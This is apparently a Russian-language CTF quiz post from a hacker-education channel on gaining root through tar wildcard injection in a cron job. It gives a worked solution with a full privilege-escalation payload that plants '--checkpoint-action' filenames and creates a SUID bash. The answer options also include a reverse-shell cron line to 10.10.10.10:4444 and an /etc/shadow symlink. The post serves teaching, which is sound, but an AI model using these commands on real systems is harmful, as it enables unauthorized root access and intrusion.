🐧 Wildcard Injection Challenge

Сценарий: shell от www-data, sudo нет, SUID чистые.

Нашли cron:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Права:

drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh

Цель: root shell через wildcard injection

❓ Какой payload положите в /var/www/html/:

🔥

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»

👾

ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt

❤️

echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev

🤩

chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh

Подсказка: tar * раскроет имена файлов в аргументы. После срабатывания: /tmp/r -p → root.

🐸 Библиотека хакера

#ctf_challenge

🔓 Разбор задачи

В cron у root:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Каталог доступен для записи www-data (777).
Команда tar * раскрывает имена файлов как аргументы. Если подложить файлы, имитирующие флаги, tar воспримет их как реальные параметры и выполнит произвольную команду от root.

🎯 Цель: получить root через SUID bash

Payload, который нужно поместить в /var/www/html:

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh"

--checkpoint заставит tar выполнить x.sh в процессе архивации.
Скрипт создаёт /tmp/r — копию bash с SUID-битом.

После срабатывания cron:

/tmp/r -p

Вы получаете root.

➕ Побочные варианты из задачи не подходят:
запись в cron.d недоступна, shadow в архив ничего не даёт, backup.sh не перезаписать.

Правильный ответ: 🔥

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#ctf_challenge